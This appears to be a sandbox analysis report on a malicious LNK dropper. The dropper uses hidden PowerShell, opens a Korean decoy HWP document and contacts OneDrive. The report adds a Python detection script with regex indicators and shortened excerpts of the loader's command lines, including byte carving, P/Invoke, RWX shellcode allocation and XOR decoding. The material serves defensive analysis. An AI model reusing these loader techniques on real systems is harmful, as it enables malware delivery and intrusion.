Avira LNK/Drop.Agent.VPVF
ZoneAlarm HEUR:Trojan.WinLNK.Powecod.c
GData Heur.BZC.YAX.Boxter.949.9B7AE7BC
Google Detected
MAX malware (ai score=89)
VBA32 Trojan.Link.Crafted
Time & API Arguments Status Return Repeated

send

buffer: TLS ClientHello, 120 bytes, SNI api.onedrive.com, empty session ID (binary record, not reproduced)
socket: 1328
sent: 120
1 120 0

send

buffer: 166 bytes of client handshake data following the ClientHello, no readable plaintext (binary, not reproduced)
socket: 1328
sent: 166
1 166 0

WSASend

buffer: GET /DigiCertGlobalRootG2.crt HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: cacerts.digicert.com
socket: 1916
0 0

send

buffer: TLS ClientHello, 152 bytes, SNI api.onedrive.com, 32-byte session ID echoed from the earlier ServerHello (binary record, not reproduced)
socket: 1328
sent: 152
1 152 0

send

buffer: 166 bytes of client handshake data following the ClientHello, no readable plaintext (binary, not reproduced)
socket: 1328
sent: 166
1 166 0

send

buffer: TLS ClientHello, 152 bytes, SNI api.onedrive.com, 32-byte session ID (binary record, not reproduced)
socket: 1328
sent: 152
1 152 0

send

buffer: 166 bytes of client handshake data, no readable plaintext (binary, not reproduced)
socket: 1328
sent: 166
1 166 0

send

buffer: TLS ClientHello, 152 bytes, SNI api.onedrive.com, 32-byte session ID (binary record, not reproduced)
socket: 1328
sent: 152
1 152 0

send

buffer: 166 bytes of client handshake data, no readable plaintext (binary, not reproduced)
socket: 1328
sent: 166
1 166 0

send

buffer: TLS ClientHello, 152 bytes, SNI api.onedrive.com, 32-byte session ID (binary record, not reproduced)
socket: 1328
sent: 152
1 152 0

send

buffer: 166 bytes of client handshake data, no readable plaintext (binary, not reproduced)
socket: 1328
sent: 166
1 166 0

send

buffer: TLS ClientHello, 152 bytes, SNI api.onedrive.com, 32-byte session ID (binary record, not reproduced)
socket: 1328
sent: 152
1 152 0

send

buffer: 166 bytes of client handshake data, no readable plaintext (binary, not reproduced)
socket: 1328
sent: 166
1 166 0

send

buffer: TLS ClientHello, 152 bytes, SNI api.onedrive.com, 32-byte session ID (binary record, not reproduced)
socket: 1328
sent: 152
1 152 0

send

buffer: 166 bytes of client handshake data, no readable plaintext (binary, not reproduced)
socket: 1328
sent: 166
1 166 0

send

buffer: TLS ClientHello, 152 bytes, SNI api.onedrive.com, 32-byte session ID (binary record, not reproduced)
socket: 1328
sent: 152
1 152 0

send

buffer: 166 bytes of client handshake data, no readable plaintext (binary, not reproduced)
socket: 1328
sent: 166
1 166 0

send

buffer: TLS ClientHello, 152 bytes, SNI api.onedrive.com, 32-byte session ID (binary record, not reproduced)
socket: 1328
sent: 152
1 152 0

send

buffer: 166 bytes of client handshake data, no readable plaintext (binary, not reproduced)
socket: 1328
sent: 166
1 166 0

send

buffer: TLS ClientHello, 152 bytes, SNI api.onedrive.com, 32-byte session ID (binary record, not reproduced)
socket: 1328
sent: 152
1 152 0

send

buffer: 166 bytes of client handshake data, no readable plaintext (binary, not reproduced)
socket: 1328
sent: 166
1 166 0
parent_process powershell.exe martian_process "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\mobuv0cw.cmdline"
parent_process powershell.exe martian_process "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\hi1x_fj5.cmdline"
parent_process powershell.exe martian_process "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\owptouvz.cmdline"
parent_process powershell.exe martian_process "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\n5j0ib9u.cmdline"
parent_process powershell.exe martian_process "C:\Users\test22\AppData\Local\Temp\230509.bat"
parent_process powershell.exe martian_process "C:\Program Files (x86)\Hnc\Hwp80\Hwp.exe" "C:\Users\test22\AppData\Local\Temp\워싱턴선언, 북핵 위협 대응에 얼마나 도움이 될까.hwp"
parent_process powershell.exe martian_process C:\Users\test22\AppData\Local\Temp\워싱턴선언, 북핵 위협 대응에 얼마나 도움이 될까.hwp
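The four powershell.exe to csc.exe spawns above, together with the four random-named .cmdline/.dll files in Temp, are the footprint of the four Add-Type -MemberDefinition calls (AAA, AAB, BBB, DDD) in the decoded loader: Add-Type compiles the P/Invoke stubs with the .NET 2.0 C# compiler at run time. With cmd.exe starting powershell.exe in a hidden window and powershell.exe handing the decoy to Hwp.exe, that gives a process-tree signature for this chain on top of the command-line traits. The following is an added example, not part of the report or of any vendor rule set: it encodes the traits visible in the recorded command lines as named indicators and runs them, plus the parent/child rules, over constructed Sysmon-style process-creation events. The command lines in SAMPLE_EVENTS are shortened from the recorded ones and LOADER_SNIPPET is shortened from the decoded $saint stage; the event layout (ProcessId, ParentImage, Image, CommandLine) is an assumption for the example.

```python
"""Detection logic for the PowerShell patterns in this report, run over sample
process-creation events. Added example; events and snippets are constructed."""
import re

# (name, regex) pairs; each fires at most once per command line.
INDICATORS = [
    ("hidden_window",    re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("byte_carve",       re.compile(r"\b(?:gc|get-content)\b.*-Encoding\s+Byte.*-TotalCount", re.I)),
    ("binary_drop",      re.compile(r"\b(?:sc|set-content)\b.*-Encoding\s+Byte", re.I)),
    ("lnk_self_locate",  re.compile(r"\*\.lnk.*\.length\s+-eq\s+0x[0-9A-F]+", re.I)),
    ("pinvoke_kernel32", re.compile(r'(?=.*Add-Type\s+-MemberDefinition)(?=.*DllImport\("kernel32\.dll"\))', re.I)),
    ("rwx_shellcode",    re.compile(r"VirtualProtect\(.*0x40|CreateThread\(|GlobalAlloc\(", re.I)),
    ("scriptblock_eval", re.compile(r"\[Scriptblock\]::Create\(", re.I)),
    ("hex_stage",        re.compile(r"\[convert\]::toint16\([^)]*,\s*16\)|[0-9A-F]{200,}", re.I)),
    ("xor_decode",       re.compile(r"-bxor", re.I)),
    ("tls_pin_1_2",      re.compile(r"SecurityProtocolType\],\s*3072", re.I)),
]

# Parent/child pairs seen in this chain. Strong ones are flagged on their own;
# the others only together with command-line indicators.
PROCESS_TREE_RULES = {
    ("powershell.exe", "csc.exe"): "addtype_compile",     # Add-Type -MemberDefinition compiling stubs
    ("powershell.exe", "hwp.exe"): "decoy_document_open",
    ("cmd.exe", "powershell.exe"): "cmd_spawns_powershell",
    ("powershell.exe", "cmd.exe"): "powershell_spawns_cmd",
}
STRONG_TREE_RULES = {"addtype_compile", "decoy_document_open"}
FLAG_THRESHOLD = 3  # indicators needed before a command line is flagged on its own


def score_cmdline(cmdline: str) -> list:
    """Return the names of all indicators present in one command line, in table order."""
    return [name for name, rx in INDICATORS if rx.search(cmdline)]


def suspicious_parent_child(parent_image: str, image: str):
    """Map a parent/child image pair (full paths or bare names) to a tree rule, or None."""
    key = (parent_image.rsplit("\\", 1)[-1].lower(), image.rsplit("\\", 1)[-1].lower())
    return PROCESS_TREE_RULES.get(key)


def flag_events(events: list) -> list:
    """Run both checks over Sysmon-style process-creation events (dicts) and return the hits."""
    hits = []
    for ev in events:
        names = score_cmdline(ev.get("CommandLine", ""))
        tree = suspicious_parent_child(ev.get("ParentImage", ""), ev.get("Image", ""))
        if len(names) >= FLAG_THRESHOLD or tree in STRONG_TREE_RULES or (tree and names):
            hits.append({"pid": ev["ProcessId"], "indicators": names, "tree_rule": tree})
    return hits


# Shortened from the decoded $saint stage (constructed excerpt, not the full script).
LOADER_SNIPPET = ('$aa=\'[DllImport("kernel32.dll")]public static extern IntPtr GlobalAlloc(uint b,uint c);\';'
                  '$b=Add-Type -MemberDefinition $aa -Name "AAA" -PassThru;'
                  '$aab::VirtualProtect($x0, $xmpw4.Length+0x100, 0x40, [ref]$old);'
                  '($xmpw4[$h] -bxor $xmpw4[0])')

# Constructed events; command lines are abbreviated from the recorded ones.
SAMPLE_EVENTS = [
    {"ProcessId": 2220, "ParentImage": r"C:\Windows\SysWOW64\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -windowstyle hidden $lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk | "
                    "where-object {$_.length -eq 0x00032CA73D}; $pdfFile = gc $lnkpath -Encoding Byte "
                    "-TotalCount 00062888; sc $pdfPath ([byte[]]($pdfFile | select -Skip 004008)) -Encoding Byte"},
    {"ProcessId": 2548, "ParentImage": r"C:\Windows\SysWOW64\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -windowstyle hidden -command "$saint="""' + "5B4E65742E" * 50 +
                    '""";$moni=$moni+[char]([convert]::toint16($POLL,16));'
                    'Invoke-Command -ScriptBlock ([Scriptblock]::Create($moni));"'},
    {"ProcessId": 3100, "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe",
     "CommandLine": r'"csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\mobuv0cw.cmdline"'},
    {"ProcessId": 4000, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -NoProfile -Command Get-Date"},
]
```

The indicators are deliberately keyed on behaviour the loader cannot drop without changing how it works (byte-level carving from its own carrier, run-time P/Invoke compilation, RWX protection, single-byte XOR, hex staging), not on variable names such as $saint or $xmpw4, which cost the author nothing to change.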
Process injection Process 3012 resumed a thread in remote process 2200 (2200 is the cmd.exe that 3012 itself created with CREATE_SUSPENDED, see the CreateProcessInternalW record above with thread_handle 0x00000334; a parent resuming its own suspended child is the normal start /wait sequence, so this hit on its own is not evidence of injection)
Process injection Process 284 resumed a thread in remote process 452 (the NtResumeThread below reports suspend_count 0, i.e. the thread was not suspended when resumed; the process that created 452 is not shown in this excerpt, so this hit carries the same caveat)
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000334
suspend_count: 1
process_identifier: 2200
1 0 0

NtResumeThread

thread_handle: 0x00000088
suspend_count: 0
process_identifier: 452
1 0 0
option -windowstyle hidden value Attempts to execute command with a hidden window
option -windowstyle hidden value Attempts to execute command with a hidden window
option -windowstyle hidden value Attempts to execute command with a hidden window
option -windowstyle hidden value Attempts to execute command with a hidden window
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
file C:\Program Files (x86)\Hnc\Hwp80\Hwp.exe